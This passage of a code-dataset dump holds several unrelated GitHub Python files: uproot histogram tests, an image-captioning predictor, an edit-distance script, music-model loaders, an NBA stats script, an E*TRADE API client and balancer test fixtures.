h_3D_noweights_nolabels.GetNbinsX()\n == h_3D_weights_nolabels.GetNbinsX()\n == h_3D_noweights_labels.GetNbinsX()\n == h_3D_weights_labels.GetNbinsX()\n == 20\n )\n assert (\n h_3D_noweights_nolabels.GetNbinsY()\n == h_3D_weights_nolabels.GetNbinsY()\n == h_3D_noweights_labels.GetNbinsY()\n == h_3D_weights_labels.GetNbinsY()\n == 10\n )\n assert (\n h_3D_noweights_nolabels.GetNbinsZ()\n == h_3D_weights_nolabels.GetNbinsZ()\n == h_3D_noweights_labels.GetNbinsZ()\n == h_3D_weights_labels.GetNbinsZ()\n == 5\n )\n for i in range(h_3D_noweights_labels.GetNbinsX()):\n h_3D_weights_labels.GetXaxis().SetBinLabel(i + 1, f\"label_{i}\")\n for i in range(h_3D_noweights_labels.GetNbinsZ()):\n # add z labels to this one\n h_3D_noweights_labels.GetZaxis().SetBinLabel(i + 1, f\"label_{i}\")\n\n assert (\n len(h_3D_weights_nolabels.GetSumw2())\n == len(h_3D_weights_labels.GetSumw2())\n == 1848\n )\n assert (\n len(h_3D_noweights_nolabels.GetSumw2())\n == len(h_3D_noweights_labels.GetSumw2())\n == 0\n )\n\n assert h_3D_weights_labels.GetXaxis().GetLabels().GetSize() == 20\n assert h_3D_noweights_labels.GetZaxis().GetLabels().GetSize() == 5\n\n fout = ROOT.TFile(newfile, \"RECREATE\")\n h_3D_noweights_nolabels.Write()\n h_3D_weights_nolabels.Write()\n h_3D_noweights_labels.Write()\n h_3D_weights_labels.Write()\n fout.Close()\n\n with uproot.open(newfile) as fin:\n h_3D_noweights_nolabels = fin[\"h_3D_noweights_nolabels\"]\n h_3D_weights_nolabels = fin[\"h_3D_weights_nolabels\"]\n h_3D_noweights_labels = fin[\"h_3D_noweights_labels\"]\n h_3D_weights_labels = fin[\"h_3D_weights_labels\"]\n\n h_3D_noweights_nolabels.to_hist()\n h_3D_weights_nolabels.to_hist()\n h_3D_noweights_labels.to_hist()\n h_3D_weights_labels.to_hist()\n","repo_name":"scikit-hep/uproot5","sub_path":"tests/test_0422-hist-integration.py","file_name":"test_0422-hist-integration.py","file_ext":"py","file_size_in_byte":17479,"program_lang":"python","lang":"en","doc_type":"code","stars":206,"dataset":"github-code","pt":"3"} +{"seq_id":"25974710511","text":"from PIL import Image\nfrom io import BytesIO\nimport cv2\nimport base64\nfrom tqdm import tqdm\nimport urllib.request\nfrom keras_preprocessing.sequence 
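# A minimal sketch of the round trip the uproot tests above exercise, without
# the ROOT dependency: a weighted 1-D histogram written by uproot keeps its
# fSumw2, so reading it back and calling to_hist() yields Weight storage.
# Assumes uproot>=5 and hist are installed; the file name is illustrative.
import numpy as np
import hist
import uproot

h = hist.Hist.new.Reg(20, 0.0, 5.0, name="x").Weight()
h.fill(5.0 * np.random.random(1000), weight=np.random.random(1000))

with uproot.recreate("roundtrip.root") as fout:
    fout["h"] = h

with uproot.open("roundtrip.root") as fin:
    h_back = fin["h"].to_hist()

assert str(h_back.storage_type) == "<class 'boost_histogram.storage.Weight'>"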
import pad_sequences\nimport numpy as np\nimport summarize\nimport requests\n\n\ndef predict(model, resnet, vocab, inv_vocab, data, count_api):\n max_len = 40\n\n loc = 'static/file.jpg'\n if 'call' not in data.keys():\n img = data['file'].split(',')[1]\n img = Image.open(BytesIO(base64.decodebytes(bytes(img, 'utf-8'))))\n img.save(loc)\n else:\n urllib.request.urlretrieve(\n data['data']['image_urls'],\n loc)\n\n print(\"=\"*50)\n print(\"IMAGE SAVED\")\n\n image = cv2.imread('static/file.jpg')\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n image = cv2.resize(image, (224, 224))\n\n image = np.reshape(image, (1, 224, 224, 3))\n\n incept = resnet.predict(image).reshape(1, 2048)\n\n print(\"=\"*50)\n print(\"Predict Features\")\n\n text_in = ['startofseq']\n\n final = ''\n\n print(\"=\"*50)\n print(\"GETING Captions\")\n\n count = 0\n while tqdm(count < 20):\n\n count += 1\n\n encoded = []\n for i in text_in:\n encoded.append(vocab[i])\n\n padded = pad_sequences(\n [encoded], maxlen=max_len, padding='post', truncating='post').reshape(1, max_len)\n\n sampled_index = np.argmax(model.predict([incept, padded]))\n\n sampled_word = inv_vocab[sampled_index]\n\n if sampled_word != 'endofseq':\n final = final + ' ' + sampled_word\n\n text_in.append(sampled_word)\n\n result = {'caption': final}\n\n # if 'article' in data['data'].keys():\n # text = data['data']['article']\n # description = summarize.text_summarize(text, count_api)\n # result = {\n # 'caption': final,\n # 'description': description\n # }\n return result\n","repo_name":"AyushSolanki123/captic-model","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17040881567","text":"#Python3\n#week -5 - assign3\nimport numpy as np\ndef Distance(A,B):\n c= np.zeros((len(A),len(B)),int)\n for i in range(len(A)):\n c[i][0] = i\n for i in range(len(B)):\n c[0][i] = i\n for i in range(1,len(A)):\n for j in range(1,len(B)):\n if A[i] != B[j]:\n c[i][j] = min(c[i-1][j-1],c[i-1][j],c[i][j-1]) + 1\n else:\n c[i][j] = min(c[i-1][j-1],c[i-1][j]+1,c[i][j-1]+1) \n return c[len(A)-1][len(B)-1]\nstring1 = \" \" +input()\nstring2 = \" \" +input()\nA = [char for char in string1]\nB = [char for char in string2]\nprint(Distance(A,B))","repo_name":"JuhiSrivastava/Algorithmic-Toolbox","sub_path":"C1 - Week5/edit_distance.py","file_name":"edit_distance.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8061726132","text":"import torch\n\n\ndef music2mel(clip):\n if len(clip.shape) == 1:\n clip = clip.unsqueeze(0)\n\n from trainer.injectors.audio_injectors import TorchMelSpectrogramInjector\n inj = TorchMelSpectrogramInjector({'n_mel_channels': 256, 'mel_fmax': 11000, 'filter_length': 16000,\n 'normalize': True, 'true_normalization': True, 'in': 'in', 'out': 'out'}, {})\n return inj({'in': clip})['out']\n\n\ndef music2cqt(clip):\n def normalize_cqt(cqt):\n # CQT_MIN = 0\n CQT_MAX = 18\n return 2 * cqt / CQT_MAX - 1\n\n if len(clip.shape) == 1:\n clip = clip.unsqueeze(0)\n from nnAudio.features.cqt import CQT\n # Visually, filter_scale=.25 seems to be the most descriptive representation, but loses frequency fidelity.\n # It may be desirable to mix filter_scale=.25 with filter_scale=1.\n cqt = CQT(sr=22050, hop_length=256, n_bins=256, bins_per_octave=32, filter_scale=.25, norm=1, verbose=False)\n return 
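# Worked example for the edit-distance record above, assuming Distance() is
# in scope exactly as defined there (the leading space plays the role of the
# empty-prefix row/column of the DP table).
A = [char for char in " kitten"]
B = [char for char in " sitting"]
# Distance(A, B) returns 3: substitute k->s, substitute e->i, insert g.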
normalize_cqt(cqt(clip))\n\n\ndef get_mel2wav_model():\n from models.audio.music.unet_diffusion_waveform_gen_simple import DiffusionWaveformGen\n model = DiffusionWaveformGen(model_channels=256, in_channels=16, in_mel_channels=256, out_channels=32, channel_mult=[1,2,3,4,4],\n num_res_blocks=[3,3,2,2,1], token_conditioning_resolutions=[1,4,16], dropout=0, kernel_size=3, scale_factor=2,\n time_embed_dim_multiplier=4, unconditioned_percentage=0)\n model.load_state_dict(torch.load(\"../experiments/music_mel2wav.pth\", map_location=torch.device('cpu')))\n model.eval()\n return model\n\n\ndef get_mel2wav_v3_model():\n from models.audio.music.unet_diffusion_waveform_gen3 import DiffusionWaveformGen\n model = DiffusionWaveformGen(model_channels=256, in_channels=16, in_mel_channels=256, out_channels=32, channel_mult=[1,1.5,2,4],\n num_res_blocks=[2,1,1,0], mid_resnet_depth=24, token_conditioning_resolutions=[1,4],\n dropout=0, time_embed_dim_multiplier=1, unconditioned_percentage=0)\n model.load_state_dict(torch.load(\"../experiments/music_mel2wav_v3.pth\", map_location=torch.device('cpu')))\n model.eval()\n return model\n\n\ndef get_music_codegen():\n from models.audio.mel2vec import ContrastiveTrainingWrapper\n model = ContrastiveTrainingWrapper(mel_input_channels=256, inner_dim=1024, layers=24, dropout=0,\n mask_time_prob=0,\n mask_time_length=6, num_negatives=100, codebook_size=16, codebook_groups=4,\n disable_custom_linear_init=True, do_reconstruction_loss=True)\n model.load_state_dict(torch.load(f\"../experiments/m2v_music.pth\", map_location=torch.device('cpu')))\n model = model.eval()\n return model\n\n\ndef get_cheater_encoder():\n from models.audio.music.gpt_music2 import UpperEncoder\n encoder = UpperEncoder(256, 1024, 256)\n encoder.load_state_dict(\n torch.load('../experiments/music_cheater_encoder_256.pth', map_location=torch.device('cpu')))\n encoder = encoder.eval()\n return encoder\n\n\ndef get_cheater_decoder():\n from models.audio.music.transformer_diffusion12 import TransformerDiffusionWithCheaterLatent\n model = TransformerDiffusionWithCheaterLatent(in_channels=256, out_channels=512, model_channels=1024,\n contraction_dim=512, prenet_channels=1024, input_vec_dim=256,\n prenet_layers=6, num_heads=8, num_layers=16, new_code_expansion=True,\n dropout=0, unconditioned_percentage=0)\n model.load_state_dict(torch.load(f'../experiments/music_cheater_decoder.pth', map_location=torch.device('cpu')))\n model = model.eval()\n return model\n\n\ndef get_ar_prior():\n from models.audio.music.cheater_gen_ar import ConditioningAR\n cheater_ar = ConditioningAR(1024, layers=24, dropout=0, cond_free_percent=0)\n cheater_ar.load_state_dict(torch.load('../experiments/music_cheater_ar.pth', map_location=torch.device('cpu')))\n cheater_ar = cheater_ar.eval()\n return cheater_ar","repo_name":"neonbjb/DL-Art-School","sub_path":"codes/utils/music_utils.py","file_name":"music_utils.py","file_ext":"py","file_size_in_byte":4248,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"3"} +{"seq_id":"34818575254","text":"\"\"\"\nIs offense or defense a better indicator for overall ranking in the NBA?\n\nTook the average points for and aganist a NBA team as the basis for offensive and defensive rankings.\nCompared the overall ranking, determined by their season record, to the offensive and defensive rankings.\nThe 2014-2015 NBA statistics is provided by http://www.basketball-reference.com/leagues/NBA_2015.html\n\"\"\"\nimport csv\nimport sys\n\n\nresults = []\nwith 
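# Hedged usage sketch for the music helpers above. music2mel only needs a raw
# 22.05 kHz clip; the model loaders additionally require the DL-Art-School
# checkpoints under ../experiments/, so the call is left commented here.
import torch

clip = torch.randn(22050 * 4)  # ~4 seconds of noise as a stand-in clip
# mel = music2mel(clip)        # unsqueezed to (1, N) internally; returns the injector's 256-channel mel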
open('Overall_rank', newline='') as inputfile: # Gets input from file and parses into a 2D list\n for i in csv.reader(inputfile):\n results.append(i)\n\nteam_rank = []\ntemp = []\nfor i in results: # Adds overall rank, name, and record\n temp.append(i[0])\n temp.append(i[1])\n temp.append(i[2])\n team_rank.append(temp)\n temp = []\n\nresults.clear()\nwith open('Offense', newline='') as inputfile:\n for i in csv.reader(inputfile):\n results.append(i)\n\ntemp_str = \"\"\nfor i in results: # Adds Offense ranking and average points per game\n if i[1][len(i[1]) - 1] == '*': # removes askerisks from end of names (if there is one)\n tempstr = (i[1])[:len(i[1]) - 1]\n else:\n tempstr = i[1]\n for j in team_rank:\n if tempstr == j[1]:\n j.append(i[0])\n j.append(i[len(i) - 1])\n\n\nresults.clear()\nwith open('Defense', newline='') as inputfile:\n for i in csv.reader(inputfile):\n results.append(i)\n\nfor i in results: # Adds deffense ranking and average point per game aganist\n if i[1][len(i[1]) - 1] == '*':\n tempstr = (i[1])[:len(i[1]) - 1]\n else:\n tempstr = i[1]\n for j in team_rank:\n if tempstr == j[1]:\n j.append(i[0])\n j.append(i[len(i) - 1])\n\ndefense_rank_dif = 0\noffense_rank_dif = 0\nfor i in team_rank: # calculates average differences\n defense_rank_dif += abs(int(i[0]) - int(i[5]))\n offense_rank_dif += abs(int(i[0]) - int(i[3]))\ndefense_rank_dif /= 30\noffense_rank_dif /= 30\nprint('Average difference between overall ranking and offensive ranking = %s\\n'\n 'Average difference between overall ranking and defensive ranking = %s\\n'\n % (offense_rank_dif, defense_rank_dif))\n\nprint('Rank Name Record Offensive Ranking Points Per Game Defensive Ranking Points Per Game')\nfor i in team_rank: # prints with spacing\n sys.stdout.write(i[0])\n sys.stdout.write(' ')\n sys.stdout.write(i[1])\n length_counter = len(i[1])\n while length_counter < 30:\n sys.stdout.write(' ')\n length_counter += 1\n print(i[2], ' ', i[3], ' ', i[4], ' ', i[5], ' ', i[6])","repo_name":"haochiencho/NBA-Rankings","sub_path":"NBA_stats.py","file_name":"NBA_stats.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42302633984","text":"from typing import Tuple, List, Optional, Union, Any, Sequence, Dict\n\nimport xmltodict\nfrom requests_oauthlib import OAuth1Session, requests\n\n\n#\n#\n#\nclass EtradeAuthorization:\n def __init__(self):\n self.__auth_session = None\n\n def get_request_token(self, consumer_key: str, consumer_secret: str) -> str:\n self.__auth_session = OAuth1Session(consumer_key, consumer_secret, callback_uri='oob', signature_type='AUTH_HEADER')\n self.__auth_session.fetch_request_token('https://api.etrade.com/oauth/request_token')\n authorization_url = self.__auth_session.authorization_url('https://us.etrade.com/e/t/etws/authorize')\n a_key = self.__auth_session.parse_authorization_response(authorization_url)\n return '%s?key=%s&token=%s' % ('https://us.etrade.com/e/t/etws/authorize', consumer_key, a_key['oauth_token'])\n\n def get_access_token(self, verifier: str) -> dict:\n return self.__auth_session.fetch_access_token('https://api.etrade.com/oauth/access_token', verifier=verifier)\n\n @staticmethod\n def get_session(consumer_key: str, consumer_secret: str, tokens: dict) -> OAuth1Session:\n return OAuth1Session(consumer_key, consumer_secret, tokens['oauth_token'],\n tokens['oauth_token_secret'], signature_type='AUTH_HEADER')\n\n\n#\n#\n#\nclass EtradeApi:\n QuoteData = Tuple[str, Dict[str, 
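# Toy check of the metric used in the NBA script above: the mean absolute gap
# between overall rank (index 0) and offensive rank (index 3) or defensive
# rank (index 5), on two hypothetical teams instead of the full 30-team table.
team_rank_demo = [
    ['1', 'TeamA', '60-22', '3', '110.0', '2', '98.0'],
    ['2', 'TeamB', '55-27', '1', '112.0', '5', '103.0'],
]
off_dif = sum(abs(int(t[0]) - int(t[3])) for t in team_rank_demo) / len(team_rank_demo)
def_dif = sum(abs(int(t[0]) - int(t[5])) for t in team_rank_demo) / len(team_rank_demo)
print(off_dif, def_dif)  # 1.5 2.0 -> offense tracks the overall rank more closely here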
float]]\n\n #\n #\n #\n def __init__(self, session: OAuth1Session, use_product_key: bool):\n self.__use_product_key = use_product_key\n self.__base_url_dev = 'https://apisb.etrade.com/v1/'\n self.__base_url_prod = 'https://api.etrade.com/v1/'\n self.__session = session\n\n #\n #\n #\n def revoke_access_token(self) -> None:\n \"\"\"Revokes access token.\"\"\"\n resp = self.__session.get('https://api.etrade.com/oauth/revoke_access_token')\n resp.raise_for_status()\n resp = xmltodict.parse(resp.text)\n if 'Error' in resp: # TODO Not fully tested.\n raise ValueError(resp['Error']['message'])\n\n #\n #\n #\n def __get_url(self, command: str = '') -> str:\n if self.__use_product_key:\n return self.__base_url_prod + command\n else:\n return self.__base_url_dev + command\n\n #\n #\n #\n @staticmethod\n def __to_list(list_or_object: Union[Sequence, Any]) -> List[Any]:\n if isinstance(list_or_object, list):\n return list_or_object\n if isinstance(list_or_object, tuple):\n return list(list_or_object)\n return [list_or_object]\n\n #\n #\n #\n def get_account_balance(self, account_id: str) -> Tuple[float, float, float]:\n \"\"\"Retrieves account balance.\n\n Args:\n account_id: Id of the account where the request has to be performed.\n\n Returns:\n Total account value\n Amount of cash available for investment\n Amount of cash not settled\n \"\"\"\n api_url = self.__get_url('accounts/' + account_id + '/balance?instType=BROKERAGE&realTimeNAV=true')\n resp = self.__session.get(api_url)\n\n info = self.__retrieve_response(resp)\n info = info['BalanceResponse']['Computed']\n return (float(info['RealTimeValues']['totalAccountValue']),\n float(info['settledCashForInvestment']),\n float(info['unSettledCashForInvestment']))\n\n #\n #\n #\n def list_accounts(self) -> List[Tuple[int, int, str, str]]:\n \"\"\"Lists all available accounts.\n\n Returns:\n A list of (account number, account id, account description, account key)\n \"\"\"\n api_url = self.__get_url('accounts/list')\n resp = self.__session.get(api_url)\n\n accounts = self.__retrieve_response(resp)\n accounts = self.__to_list(accounts['AccountListResponse']['Accounts']['Account'])\n accounts = [(i, accounts[i]['accountId'], accounts[i]['accountDesc'], accounts[i]['accountIdKey']) for i in range(len(accounts))]\n return accounts\n\n #\n #\n #\n def get_account_positions(self, account_id: str) -> List[Tuple[str, float, float, float]]:\n \"\"\"Retrieves all account positions.\n\n Args:\n account_id: Id of the account where the request has to be performed.\n\n Returns:\n A list of (symbol, qty, currentPrice, costBasis)\n \"\"\"\n # TODO Paging is not implemented.\n api_url = self.__get_url('accounts/' + str(account_id) + '/portfolio')\n resp = self.__session.get(api_url)\n\n positions = self.__retrieve_response(resp)\n positions = self.__to_list(positions['PortfolioResponse']['AccountPortfolio']['Position'])\n positions = [(\n p['Product']['symbol'].strip().upper(),\n float(p['quantity']),\n float(p['marketValue']) / float(p['quantity']),\n float(p['totalCost'])) for p in positions]\n return positions\n\n #\n #\n #\n @staticmethod\n def __format_quote(data: dict, label: str) -> Dict[str, float]:\n export_data = {'ask': float(data['ask']),\n 'bid': float(data['bid']),\n 'high': float(data['high']),\n 'low': float(data['low']),\n 'lastTrade': float(data['lastTrade']),\n 'totalVolume': float(data['totalVolume'])}\n if export_data['bid'] == 0 and export_data['ask'] == 0:\n export_data['ask'] = export_data['lastTrade']\n export_data['bid'] = 
export_data['lastTrade']\n if label == 'All':\n export_data['askSize'] = float(data['askSize'])\n export_data['bidSize'] = float(data['bidSize'])\n export_data['eps'] = float(data['eps'])\n export_data['estEarnings'] = float(data['estEarnings'])\n export_data['dividend'] = float(data['dividend'])\n export_data['symbolDescription'] = data['symbolDescription']\n return export_data\n\n #\n #\n #\n def get_quote(self, symbols: Sequence[str], only_intraday_data: bool) -> List[QuoteData]:\n \"\"\"Retrieves quote information.\n\n Args:\n symbols: List of symbols to retrieve.\n only_intraday_data: Boolean indicating if the only intraday data has to be retrieve.\n\n Returns:\n A list of QuoteData where QuoteData = (symbol, symbol_data).\n Symbol_data contains:\n intraday: 'ask', 'bid', 'high', 'low', 'lastTrade', 'totalVolume'\n all: 'askSize', 'bidSize', 'eps', 'estEarnings', 'dividend', 'symbolDescription'\n \"\"\"\n if len(symbols) > 25:\n raise ValueError('get_quote: Too many symbols to quote.')\n\n api_url = self.__get_url('market/quote/' + ','.join(symbols))\n params = {'detailFlag': 'ALL'} if not only_intraday_data else {'detailFlag': 'INTRADAY'}\n resp = self.__session.get(api_url, params=params)\n\n data = self.__retrieve_response(resp)\n data = data['QuoteResponse']['QuoteData']\n label = 'All' if not only_intraday_data else 'Intraday'\n if isinstance(data, dict):\n return [(data['Product']['symbol'], self.__format_quote(data[label], label))]\n else:\n return [(x['Product']['symbol'], self.__format_quote(x[label], label)) for x in data]\n\n #\n #\n #\n def list_orders(self, account_id: str, count: int, marker: Optional[int]) -> Tuple[Sequence[dict], Optional[int]]:\n \"\"\"Retrieves all orders.\n\n Args:\n account_id: Id of the account where the request has to be performed.\n count: Number of orders to retrieve.\n marker: Marker of the first order to retrieve.\n\n Returns:\n order_data: List of orders.\n current_marker: Next marker.\n \"\"\"\n api_url = self.__get_url('accounts/' + account_id + '/orders')\n\n params = {'count': count}\n if marker is not None:\n params['marker'] = marker\n\n resp = self.__session.get(api_url, params=params)\n\n resp = self.__retrieve_response(resp)\n resp = resp['OrdersResponse']\n current_marker = None\n if 'marker' in resp:\n if len(resp['marker']) != 0:\n current_marker = int(resp['marker'])\n order_list = self.__to_list(resp['Order'])\n\n order_data = []\n for o in order_list:\n order_info = {'orderId': int(o['orderId'])}\n o = o['OrderDetail']\n order_info['orderStatus'] = o['status']\n order_info['symbol'] = o['Instrument']['Product']['symbol']\n order_info['orderAction'] = o['Instrument']['orderAction']\n order_info['orderedQuantity'] = o['Instrument']['orderedQuantity']\n order_info['orderTerm'] = o['orderTerm']\n order_info['marketSession'] = o['marketSession']\n if order_info['orderStatus'] == 'EXECUTED':\n order_info['executedPrice'] = o['Instrument']['averageExecutionPrice']\n order_info['filledQuantity'] = o['Instrument']['filledQuantity']\n if order_info['orderStatus'] == 'OPEN':\n order_info['priceType'] = o['priceType']\n if order_info['priceType'] == 'LIMIT':\n order_info['limitPrice'] = o['limitPrice']\n if order_info['priceType'] == 'STOP':\n order_info['stopPrice'] = o['stopPrice']\n if order_info['priceType'] == 'STOP_LIMIT':\n order_info['limitPrice'] = o['limitPrice']\n order_info['stopPrice'] = o['stopPrice']\n order_data.append(order_info)\n\n return order_data, current_marker\n\n #\n #\n #\n @staticmethod\n def 
__check_order(**kwargs) -> None:\n mandatory = [\n 'accountId',\n 'symbol',\n 'orderAction',\n 'clientOrderId',\n 'priceType',\n 'quantity',\n 'orderTerm',\n 'marketSession',\n ]\n if not all(param in kwargs for param in mandatory):\n raise ValueError('__check_order: input parameters missing.')\n\n if kwargs['priceType'] == 'STOP' and 'stopPrice' not in kwargs:\n raise ValueError('__check_order: stopPrice missing.')\n if kwargs['priceType'] == 'LIMIT' and 'limitPrice' not in kwargs:\n raise ValueError('__check_order: limitPrice missing.')\n if (kwargs['priceType'] == 'STOP_LIMIT'\n and 'limitPrice' not in kwargs\n and 'stopPrice' not in kwargs):\n raise ValueError('__check_order: stopPrice or limitPrice missing.')\n\n #\n #\n #\n @staticmethod\n def __build_order_payload(order_type: str, **kwargs) -> dict:\n instrument = {\n 'Product': {'securityType': 'EQ',\n 'symbol': kwargs['symbol']},\n 'orderAction': kwargs['orderAction'],\n 'quantityType': 'QUANTITY',\n 'quantity': int(kwargs['quantity']), # TODO Force convertion to integer.\n }\n order = kwargs\n order['Instrument'] = instrument\n payload = {\n order_type: {\n 'orderType': 'EQ',\n 'clientOrderId': kwargs['clientOrderId'],\n 'Order': order,\n }\n }\n if 'previewId' in kwargs:\n payload[order_type]['PreviewIds'] = {'previewId': kwargs['previewId']}\n return payload\n\n #\n #\n #\n @staticmethod\n def __retrieve_response(resp: requests.models.Response) -> dict:\n resp.raise_for_status()\n resp = xmltodict.parse(resp.text)\n # TODO Not fully tested.\n if len(resp.keys()) == 1:\n body = resp[next(iter(resp))]\n if len(body.keys()) == 1:\n if 'Messages' in body:\n raise ValueError(body['Messages']['Message']['description'])\n if 'Error' in resp:\n raise ValueError(resp['Error']['message'])\n return resp\n\n #\n #\n #\n def __perform_request(self, request_type: str, api_url: str, payload: dict) -> dict:\n headers = {'Content-Type': 'application/xml'}\n payload = xmltodict.unparse(payload, encoding='utf-8')\n resp = None\n if request_type == 'post':\n resp = self.__session.post(api_url, data=payload, headers=headers)\n if request_type == 'put':\n resp = self.__session.put(api_url, data=payload, headers=headers)\n if resp is not None:\n resp.raise_for_status()\n resp = xmltodict.parse(resp.text)\n if 'Error' in resp:\n raise ValueError(resp['Error']['message'])\n else:\n raise ValueError('__perform_request: invalid value in request_type.')\n return resp\n\n #\n #\n #\n def __generate_order_preview(self, **kwargs) -> int:\n self.__check_order(**kwargs)\n api_url = self.__get_url('accounts/' + kwargs['accountId'] + '/orders/preview')\n payload = self.__build_order_payload(order_type='PreviewOrderRequest', **kwargs)\n\n resp = self.__perform_request(request_type='post', api_url=api_url, payload=payload)\n return int(resp['PreviewOrderResponse']['PreviewIds']['previewId'])\n\n #\n #\n #\n def __generate_change_order_preview(self, **kwargs) -> int:\n self.__check_order(**kwargs)\n api_url = self.__get_url('accounts/' + kwargs['accountId'] + '/orders/' + str(kwargs['orderId']) + '/change/preview')\n payload = self.__build_order_payload(order_type='PreviewOrderRequest', **kwargs)\n\n resp = self.__perform_request(request_type='put', api_url=api_url, payload=payload)\n return int(resp['PreviewOrderResponse']['PreviewIds']['previewId'])\n\n #\n #\n #\n def place_equity_order(self, **kwargs) -> int:\n \"\"\"Places an equity order.\n\n Args:\n accountId: str\n symbol: str\n orderAction: BUY or SELL.\n clientOrderId: str\n priceType: MARKET, LIMIT, or 
STOP.\n limitPrice: float\n stopPrice: float\n quantity: int\n marketSession: REGULAR or EXTENDED.\n orderTerm: GOOD_UNTIL_CANCEL\n prev_order_id: int\n\n Returns:\n Order number.\n \"\"\"\n self.__check_order(**kwargs)\n\n if 'prev_order_id' in kwargs:\n prev_order_id = kwargs.pop('prev_order_id')\n if prev_order_id is not None:\n kwargs['orderId'] = prev_order_id\n return self.__change_equity_order(**kwargs)\n\n if 'previewId' not in kwargs:\n kwargs['previewId'] = self.__generate_order_preview(**kwargs)\n\n api_url = self.__get_url('accounts/' + kwargs['accountId'] + '/orders/place')\n payload = self.__build_order_payload(order_type='PlaceOrderRequest', **kwargs)\n\n resp = self.__perform_request(request_type='post', api_url=api_url, payload=payload)\n return int(resp['PlaceOrderResponse']['OrderIds']['orderId'])\n\n #\n #\n #\n def __change_equity_order(self, **kwargs) -> int:\n self.__check_order(**kwargs)\n\n if 'previewId' not in kwargs:\n kwargs['previewId'] = self.__generate_change_order_preview(**kwargs)\n\n api_url = self.__get_url('accounts/' + kwargs['accountId'] + '/orders/' + str(kwargs['orderId']) + '/change/place')\n payload = self.__build_order_payload(order_type='PlaceOrderRequest', **kwargs)\n\n resp = self.__perform_request(request_type='put', api_url=api_url, payload=payload)\n return int(resp['PlaceOrderResponse']['OrderIds']['orderId'])\n\n #\n #\n #\n def cancel_order(self, account_id: str, order_id: int) -> str:\n \"\"\"Cancels an order.\n\n Args:\n account_id: Id of the account where the request has to be performed.\n order_id: Id of the order to cancel.\n\n Returns:\n Confirmation message.\n \"\"\"\n api_url = self.__get_url('accounts/' + account_id + '/orders/cancel')\n payload = {'CancelOrderRequest': {'orderId': order_id}}\n\n resp = self.__perform_request(request_type='put', api_url=api_url, payload=payload)\n return resp['CancelOrderResponse']['Messages']['Message']['description']\n","repo_name":"LucaBallan/PythonTradingPlatform","sub_path":"trade_interface/e_trade_api.py","file_name":"e_trade_api.py","file_ext":"py","file_size_in_byte":16304,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"3"} +{"seq_id":"29043365747","text":"# -*- coding: utf-8 -*-\nimport sys\nimport importlib\nimport itertools\nimport pytest\nfrom collections import namedtuple\nfrom balancer.test.util import multiscope\nimport balancer.test.util.context as mod_ctx\n\nfrom balancer.test.util import asserts # noqa: F401\nfrom balancer.test.util.predef import http # noqa: F401\nfrom balancer.test.util import dnsfake # noqa: F401\nfrom balancer.test.util.predef.http.response import custom # noqa: F401\nfrom balancer.test.util.predef.handler.server.http import SimpleConfig, DummyConfig # noqa: F401\n\n\ndef __known_plugin(name):\n try:\n return importlib.import_module(name)\n except ImportError:\n return None\n\n\ndef __filter_plugins(all_plugins):\n return [p for p in map(__known_plugin, all_plugins) if p]\n\n\n__KNOWN_PLUGINS = __filter_plugins([\n 'balancer.test.plugin.awacs',\n 'balancer.test.plugin.awacs_config',\n 'balancer.test.plugin.backend',\n 'balancer.test.plugin.balancer',\n 'balancer.test.plugin.cachedaemon',\n 'balancer.test.plugin.certs',\n 'balancer.test.plugin.connection',\n 'balancer.test.plugin.dnsfake',\n 'balancer.test.plugin.fs',\n 'balancer.test.plugin.logger',\n 'balancer.test.plugin.options',\n 'balancer.test.plugin.port',\n 'balancer.test.plugin.process',\n 'balancer.test.plugin.resource',\n 
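# Hedged end-to-end sketch for the E*TRADE classes above; keys, verifier and
# account values are placeholders, and the order call is left commented
# because it would submit a real (sandbox) order.
auth = EtradeAuthorization()
print(auth.get_request_token("CONSUMER_KEY", "CONSUMER_SECRET"))  # open URL, copy verifier
tokens = auth.get_access_token("VERIFIER_FROM_BROWSER")
session = EtradeAuthorization.get_session("CONSUMER_KEY", "CONSUMER_SECRET", tokens)

api = EtradeApi(session, use_product_key=False)  # False -> sandbox base URL
print(api.get_quote(["AAPL"], only_intraday_data=True))
# order_id = api.place_equity_order(
#     accountId="ACCOUNT_ID", symbol="AAPL", orderAction="BUY",
#     clientOrderId="abc123", priceType="LIMIT", limitPrice=150.0,
#     quantity=1, orderTerm="GOOD_UNTIL_CANCEL", marketSession="REGULAR")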
'balancer.test.plugin.server',\n 'balancer.test.plugin.static',\n 'balancer.test.plugin.stream',\n 'balancer.test.plugin.sync',\n 'balancer.test.plugin.tcpdump',\n])\n\n\n__MANAGERS_ATTR = 'MANAGERS'\n__CONTEXTS_ATTR = 'CONTEXTS'\n\n\ndef __get_attrs(attr_name):\n return list(itertools.chain(*[\n getattr(plugin, attr_name) for plugin in __KNOWN_PLUGINS if hasattr(plugin, attr_name)\n ]))\n\n\n__ALL_MANAGERS = __get_attrs(__MANAGERS_ATTR)\n__ALL_CONTEXTS = __get_attrs(__CONTEXTS_ATTR)\n\n\nManager = namedtuple('Manager', [m.manager_name for m in __ALL_MANAGERS])\n\n\n__MANAGER_FIXTURE_TEMPLATE = '''\\\ndef manager({args}):\n return Manager({args_map})\n'''\n\n\ndef __gen_manager_fixture():\n namespace = dict(\n Manager=Manager,\n )\n args_str = ', '.join([m.fixture_name for m in __ALL_MANAGERS])\n args_map_str = ', '.join(['{}={}'.format(m.manager_name, m.fixture_name) for m in __ALL_MANAGERS])\n code_str = __MANAGER_FIXTURE_TEMPLATE.format(args=args_str, args_map=args_map_str)\n exec(code_str, namespace)\n return namespace['manager']\n\n\nmanager = multiscope.fixture(pytest_fixtures=[\n m.fixture_name for m in __ALL_MANAGERS if m.fixture_type == multiscope.FixtureType.PYTEST\n], parent=sys.modules[__name__])(__gen_manager_fixture())\n\n\n@multiscope.fixture(pytest_fixtures=['request', 'session_state', 'module_state', 'class_state'])\nclass StateFixture(object):\n __fixturename__ = 'state'\n\n @staticmethod\n def session_state():\n return mod_ctx.State()\n\n 